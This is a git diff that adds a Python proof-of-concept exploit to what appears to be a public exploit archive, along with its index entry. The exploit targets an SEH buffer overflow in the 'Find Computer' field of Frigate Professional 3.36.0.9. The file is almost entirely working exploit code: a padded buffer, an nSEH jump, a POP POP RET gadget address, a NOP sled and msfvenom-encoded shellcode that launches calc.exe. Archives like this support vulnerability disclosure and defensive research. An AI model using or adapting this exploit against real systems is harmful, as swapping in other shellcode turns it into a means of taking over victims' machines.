diff --git a/exploits/windows/local/48579.py b/exploits/windows/local/48579.py new file mode 100755 index 000000000..b74eed89d --- /dev/null +++ b/exploits/windows/local/48579.py @@ -0,0 +1,67 @@ +# Exploit Title: Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-04 +# Vulnerable Software: Frigate Professional +# Version: 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Disk" > Find Computer +# 6.- Paste ClipBoard into the "Computer Name:" field +# 7.- Click on OK +# 8.- Calc.exe runs + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b4b44ad01..1364a99ad 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11093,6 +11093,7 @@ id,file,description,date,author,type,platform,port 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, +48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139